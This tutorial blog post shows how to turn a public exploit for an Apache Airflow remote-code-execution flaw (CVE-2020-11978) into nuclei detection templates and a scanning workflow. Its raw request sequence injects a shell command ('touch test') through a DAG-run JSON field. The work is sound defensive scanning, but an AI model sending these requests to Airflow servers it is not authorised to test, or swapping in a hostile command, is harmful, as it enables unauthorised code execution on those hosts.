Writing security templates for Apache Airflow

Apache Airflow is an open-source tool that allows users to "programmatically author, schedule and monitor workflows". We decided to create a suite of checks for testing the security of Airflow installations and to document the entire process, showing how easy it is to write custom nuclei templates for any piece of technology.

Environment Setup

Before we start creating templates, we need to set up an Airflow instance for testing. We found this repo on GitHub with a docker-compose file that sets up a local Airflow instance. By default, the instance defined in this docker-compose file isn't configured with a password.

```bash
wget https://raw.githubusercontent.com/pberba/CVE-2020-11978/main/docker-compose.yml
docker-compose up
```

We now have a docker-compose based Apache Airflow instance running at http://127.0.0.1:8080. Starting with this tweet, we found this GitHub project by @pberba with a Python exploit for CVE-2020-11978.

What next? We wanted to quickly port this Python exploit into a nuclei template. To create a nuclei template, all we need are the HTTP requests that reproduce the bug. The easiest way to capture all the HTTP requests originating from the Python exploit script is to set the HTTP_PROXY environment variable so that every request is sent through a proxy.

```bash
HTTP_PROXY=http://127.0.0.1:8888 python CVE-2020-11978.py http://127.0.0.1:8080
```

This runs the Python exploit and routes every HTTP request it makes through our proxy listening at http://127.0.0.1:8888. It could be Burp proxy, proxify, or any other proxy of your choice. Once we have the required HTTP requests, we just need to copy-paste them into the raw section of our template and configure the matchers/extractors based on the exploit and its requests.
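To see why setting HTTP_PROXY is enough, here is a minimal Python sketch of how the standard library discovers proxy settings from the environment. The helper name `proxies_seen_by_python` is our own, and we are assuming the exploit script uses an HTTP client that honors these variables in the same way. Note that HTTP_PROXY only applies to http:// URLs; an https:// target would need HTTPS_PROXY as well.

```python
import os
import urllib.request


def proxies_seen_by_python(**env_overrides):
    """Return the proxy map Python's stdlib derives from the environment.

    env_overrides are set temporarily; previous values are restored afterwards.
    (Hypothetical helper, for illustration only.)
    """
    saved = {name: os.environ.get(name) for name in env_overrides}
    os.environ.update(env_overrides)
    try:
        # getproxies() scans variables named <scheme>_proxy, in any letter case.
        return urllib.request.getproxies()
    finally:
        for name, old in saved.items():
            if old is None:
                os.environ.pop(name, None)
            else:
                os.environ[name] = old
```

Calling `proxies_seen_by_python(HTTP_PROXY="http://127.0.0.1:8888")` returns a mapping whose `http` entry points at the intercepting proxy, which is where the captured requests end up.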

Here is what the request block of the nuclei template looks like:

```yaml
requests:
  - raw:
      - |
        GET /api/experimental/test HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: */*

      - |
        GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: */*

      - |
        POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Length: 85
        Content-Type: application/json

        {"conf": {"message": "\"; touch test #"}}

      - |
        GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: */*
```

This template consists of 4 HTTP requests. The final request includes the dynamic value {{exec_date}}, which is the execution_date we receive in the response to the 3rd HTTP request.

We can use extractors to pull a value out of the response to any HTTP request defined in the template and reuse it in later requests. For this exploit, we used a regex extractor to capture execution_date from the 3rd HTTP response and stored it in a variable named exec_date, which is then used in the last request as {{exec_date}}.

```yaml
extractors:
  - type: regex
    name: exec_date
    part: body
    group: 1
    internal: true
    regex:
      - '"execution_date":"([0-9-A-Z:+]+)"'
```

We also set internal: true because we only want to use this value internally as a variable; by default, extracted values are printed in the CLI output.
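To get a feel for what the extractor captures, the same regex can be tried in Python against a sample response. This is only a sketch: the response body below is made up for illustration (a real Airflow response will carry different values), and the function names are our own.

```python
import re

# Same pattern as the extractor; group 1 is the timestamp between the quotes.
EXEC_DATE_RE = re.compile(r'"execution_date":"([0-9-A-Z:+]+)"')

# Hypothetical body of the 3rd response (values are invented for this example).
SAMPLE_BODY = '{"execution_date":"2021-06-01T12:00:00+00:00","message":"Created dag run"}'


def extract_exec_date(body):
    """Return the captured execution_date, or None if the body has no match."""
    match = EXEC_DATE_RE.search(body)
    return match.group(1) if match else None


def task_status_path(exec_date):
    """Build the path of the 4th request, mirroring the {{exec_date}} substitution."""
    return (
        "/api/experimental/dags/example_trigger_target_dag"
        f"/dag_runs/{exec_date}/tasks/bash_task"
    )
```

Here `task_status_path(extract_exec_date(SAMPLE_BODY))` yields the path of the final request with the timestamp filled in, which is what nuclei does with the internal variable.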

The final and most important part of the template is defining the matcher. Nuclei results are only as good as the matcher, so we need to make it specific enough to avoid false-positive results.

```yaml
req-condition: true
matchers-condition: and
matchers:
  - type: dsl
    dsl:
      - 'contains(body_4, "\"operator\":\"BashOperator\"")'
      - 'contains(all_headers_4, "application/json")'
    condition: and
```

When writing a template that includes multiple HTTP requests, it's better to use req-condition: true, which lets us write matchers against specific requests. For this exploit, if the target is vulnerable, the response to the 4th HTTP request will contain the string "operator":"BashOperator".

Here the trailing digits in body_4 and all_headers_4 indicate the request number. With that, the template to detect Apache Airflow <= 1.10.10 - Example Dag Remote Code Execution is complete.
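The matcher logic can be sketched in a few lines of Python. This is an illustration of the AND condition over the 4th response, not nuclei's actual implementation; the `matches` function and the shape of `responses` are assumptions made for this example.

```python
def contains(haystack, needle):
    """Substring check, standing in for the DSL helper of the same name."""
    return needle in haystack


def matches(responses):
    """Evaluate the matcher against a list of (all_headers, body) tuples.

    The list holds one tuple per request, in the order the requests were sent.
    """
    if len(responses) < 4:
        return False
    all_headers_4, body_4 = responses[3]  # request numbers start at 1
    checks = [
        contains(body_4, '"operator":"BashOperator"'),
        contains(all_headers_4, "application/json"),
    ]
    return all(checks)  # condition: and
```

Both checks must pass on the same response, so a JSON error page or an unrelated page that merely mentions BashOperator in plain HTML does not produce a match.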

Similarly, we prepared an Apache Airflow detection template and a workflow to run multiple templates that assess the security of Airflow instances.

Now we can simply prepare a workflow that runs the Airflow detection template and, if Airflow is detected, runs all the related templates as defined below:

```yaml
workflows:

  - template: technologies/airflow-detect.yaml
    subtemplates:
      - template: cves/2020/CVE-2020-11978.yaml
      - template: cves/2020/CVE-2020-13927.yaml
      - template: exposed-panels/airflow-panel.yaml
      - template: exposures/configs/airflow-configuration-exposure.yaml
      - template: default-logins/apache/airflow-default-credentials.yaml
      - template: misconfiguration/airflow/
```

```bash
nuclei -w workflows/airflow-workflow.yaml -list airflow_urls.txt
```
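Conceptually, the workflow is a gate: the subtemplates only run against hosts where the detection template matched. The Python sketch below models that idea with plain callables; `run_workflow` and the stand-in checks are hypothetical and say nothing about how nuclei schedules templates internally.

```python
def run_workflow(target, detect, subtemplates):
    """Run subtemplates against target only if the detection check matches.

    detect: callable taking a target and returning True/False.
    subtemplates: dict mapping a template name to such a callable.
    Returns the names of the subtemplates that matched.
    """
    if not detect(target):
        return []  # not Airflow, so skip every Airflow-specific check
    return [name for name, check in subtemplates.items() if check(target)]


# Stand-in checks for illustration; real templates would send HTTP requests.
def looks_like_airflow(target):
    return target.endswith(":8080")


EXAMPLE_SUBTEMPLATES = {
    "cves/2020/CVE-2020-11978.yaml": lambda target: True,
    "exposed-panels/airflow-panel.yaml": lambda target: False,
}
```

The gate keeps scans fast and quiet: hosts that are not running Airflow receive only the detection request.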

Similarly, you can prepare sets of templates for any technology with known issues and easily automate this security testing across your organization. You can craft a template for the bug classes you find most often, so you don't have to repeat the manual steps for every host you test. Write the template once and use it forever 😉

If you have created checks for Airflow or similar solutions and want to contribute them to the growing community of public templates, do consider making a PR or opening an issue in the nuclei-templates repository.